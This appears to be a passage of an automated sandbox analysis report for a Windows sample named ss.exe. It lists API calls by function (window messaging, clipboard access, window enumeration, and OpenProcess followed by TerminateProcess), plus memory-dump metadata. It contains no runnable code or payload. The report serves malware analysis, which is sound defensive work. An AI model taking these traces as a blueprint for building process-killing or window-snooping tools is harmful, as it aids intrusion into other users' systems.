    • SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
    • __Stoull.NTSTC_LIBCMT ref: 00460C4E
    • __Stoull.NTSTC_LIBCMT ref: 00460CBF
    • __Stoull.NTSTC_LIBCMT ref: 00460DC8
    • __Stoull.NTSTC_LIBCMT ref: 00460E06
    • __Stoull.NTSTC_LIBCMT ref: 00460E74
    • __Stoull.NTSTC_LIBCMT ref: 00460EA8
    • __Stoull.NTSTC_LIBCMT ref: 00460EDF
    • __Stoull.NTSTC_LIBCMT ref: 00460F85
      • Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87
    • __Stoull.NTSTC_LIBCMT ref: 0046106B
    • SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
    • __Stoull.NTSTC_LIBCMT ref: 004611E2
    • GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
    • GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461878
      • Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
      • Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
      • Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
      • Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
      • Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
      • Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
      • Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
      • Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461938
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461990
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004619E8
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461A37
    • GetWindowLongA.USER32(?,000000F0), ref: 00461D04
    • SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
    • GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
    • SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
    • SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
    • SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
    • SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
    • SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
    • GetWindowRect.USER32(?,?), ref: 0046205B
    • SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
    • SetLastError.KERNEL32(00000000), ref: 004620A8
    • SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
    • GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
    • GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
    • GetWindowLongA.USER32(?,000000EC), ref: 004620E8
    • SetLastError.KERNEL32(00000000), ref: 0046211B
    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
    • GetLastError.KERNEL32 ref: 00462131
    • GetWindowLongA.USER32(?,000000EC), ref: 00462140
    • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
    • SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
    • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
    • SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
    • SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
      • Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679
      • Part of subcall function 00459EE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00459EF8
      • Part of subcall function 00466520: SendMessageA.USER32(FFFF8001,00000465,00000000,FFFF8001), ref: 0046654E
      • Part of subcall function 00466520: SendMessageA.USER32(00007FFF,0000046F,?,00007FFF), ref: 00466569
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
      • Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
      • Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
      • Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
      • Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
      • Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
      • Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
      • Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C
      • Part of subcall function 00466790: SendMessageA.USER32(?,0000111E,00000000,00000000), ref: 004667AE
      • Part of subcall function 00466790: GetSysColor.USER32(00000005), ref: 004667C1
      • Part of subcall function 00466790: SendMessageA.USER32(?,0000111D,00000000,?), ref: 004667D2
      • Part of subcall function 004667E0: LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
      • Part of subcall function 004667E0: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
      • Part of subcall function 004667E0: FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00000406,?,?), ref: 00466891
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7
      • Part of subcall function 004667E0: GetSysColor.USER32(0000000F), ref: 004668E2
      • Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8
    • __Stoull.NTSTC_LIBCMT ref: 004601BB
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 00460248
    • __Stoull.NTSTC_LIBCMT ref: 00460361
    • __Stoull.NTSTC_LIBCMT ref: 00460466
    • EnableWindow.USER32(?,00000000), ref: 0046049F
    • __Stoull.NTSTC_LIBCMT ref: 004604D1
    • ShowWindow.USER32(?,-00000001), ref: 0046050E
    • __Stoull.NTSTC_LIBCMT ref: 004605C5
    • __Stoull.NTSTC_LIBCMT ref: 004606BF
    • __Stoull.NTSTC_LIBCMT ref: 004606EC
    • __Stoull.NTSTC_LIBCMT ref: 004607E1
    • __Stoull.NTSTC_LIBCMT ref: 0046085F
    • __Stoull.NTSTC_LIBCMT ref: 00460887
    • __Stoull.NTSTC_LIBCMT ref: 004608D3
    • SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
    • __Stoull.NTSTC_LIBCMT ref: 00460BCE
    • SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
    • SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
    • __Stoull.NTSTC_LIBCMT ref: 00460C4E
    • __Stoull.NTSTC_LIBCMT ref: 00460CBF
    • __Stoull.NTSTC_LIBCMT ref: 00460DC8
    • __Stoull.NTSTC_LIBCMT ref: 00460E06
    • __Stoull.NTSTC_LIBCMT ref: 00460E74
    • __Stoull.NTSTC_LIBCMT ref: 00460EA8
    • __Stoull.NTSTC_LIBCMT ref: 00460EDF
    • __Stoull.NTSTC_LIBCMT ref: 00460F85
      • Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87
    • __Stoull.NTSTC_LIBCMT ref: 0046106B
    • SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
    • __Stoull.NTSTC_LIBCMT ref: 004611E2
    • GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
    • GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461AA4
      • Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
      • Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
      • Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
      • Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
      • Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
      • Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
      • Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
      • Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461B64
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461BBC
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461C14
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461C63
    • GetWindowLongA.USER32(?,000000F0), ref: 00461D04
    • SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
    • GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
    • SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
    • SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
    • SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
    • SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
    • SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
    • GetWindowRect.USER32(?,?), ref: 0046205B
    • SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
    • SetLastError.KERNEL32(00000000), ref: 004620A8
    • SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
    • GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
    • GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
    • GetWindowLongA.USER32(?,000000EC), ref: 004620E8
    • SetLastError.KERNEL32(00000000), ref: 0046211B
    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
    • GetLastError.KERNEL32 ref: 00462131
    • GetWindowLongA.USER32(?,000000EC), ref: 00462140
    • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
    • SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
    • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
    • SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
    • SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(?,00000030,?,00000000), ref: 0045B91B
    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0045B96B
    • SendMessageA.USER32(?,0000111E,00000000,?), ref: 0045B989
    • SendMessageA.USER32(?,00001006,00000001,?), ref: 0045B9A7
    • SendMessageA.USER32(00000000,0000100A,00000001,?), ref: 0045B9C5
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageTimeoutA.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 004526A7
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004526B3
    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 004526C5
    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004526D4
    • CloseHandle.KERNEL32(00000000), ref: 004526DB
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetEnvironmentVariableA.KERNEL32(?,?,00000000,00000000,?,00000000,?,?), ref: 0042086F
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
      • Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
      • Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
      • Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D
      • Part of subcall function 00474A50: GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00474AA3
      • Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87
      • Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09
    Strings
    • This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042094D, 00420971
    • Not allowed as an output variable., xrefs: 00420A90
    • This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 00420931
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00494F3B), ref: 00419A4D
      • Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F
    • SetTimer.USER32(000601DA,00000009,0000000A,00000000), ref: 004198E7
    • KillTimer.USER32(000601DA,00000009), ref: 00419930
      • Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
      • Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1
    • SysAllocString.OLEAUT32(0049E27C), ref: 00454A2E
      • Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
      • Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
      • Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
      • Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650
    • SafeArrayCopy.OLEAUT32(00000000,00000000), ref: 00454AE0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 00420405
      • Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
      • Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetLastError.KERNEL32 ref: 00451850
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • 74791B72.VERSION(00000000,0049A9C0,?,?), ref: 004518D8
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    • GetLastError.KERNEL32 ref: 0045195D
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000000,E73DE900,00000000,00494FD8,00000000,00000000,00494FD8,?,?,00494FD8,004987E9,004987E9,00403969), ref: 0046F0E6
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • WideCharToMultiByte.KERNEL32(00000000,00000400,}TD,?,00000000,00000000,00494FD8,00000000,?,?,00494FD8,004987E9,004987E9,00403969,004987E9,?), ref: 0046F0AC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(atl), ref: 00455BE2
    • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00455BF2
      • Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • IsWindowVisible.USER32(?), ref: 0047790B
    • GetWindowLongA.USER32(?,000000EC), ref: 00477926
    • GetWindowTextA.USER32(?,?,00000014), ref: 00477938
      • Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
      • Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476741
      • Part of subcall function 00476690: IsWindow.USER32(00000000), ref: 004767D4
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004767FF
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476858
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047688A
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004768F9
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 0047691B
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047694B
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A10
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A75
      • Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476C32
      • Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476DB9
      • Part of subcall function 00476B90: EnumChildWindows.USER32(00000000,00475CF0,?), ref: 00476E31
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    • _strncpy.LIBCMT ref: 0042CC2A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ss.exe,00000104), ref: 0048DAAB
    • _parse_cmdline.LIBCMT ref: 0048DAD6
      • Part of subcall function 0048ABFE: Sleep.KERNEL32(00000000,00000001,004011C4,?,004896B2,00000018,004A17D8,0000000C,00489742,004011C4,004011C4,?,0048893F,0000000D,?,0048A041), ref: 0048AC1F
    • _parse_cmdline.LIBCMT ref: 0048DB17
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7
      • Part of subcall function 00415720: LoadImageA.USER32(00400000,?,00000001,00000000,00000000,00008000), ref: 004157DB
      • Part of subcall function 00415720: Shell_NotifyIcon.SHELL32(00000001,004AC10A), ref: 004157F0
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SetMenuItemInfoA.USER32 ref: 0046A023
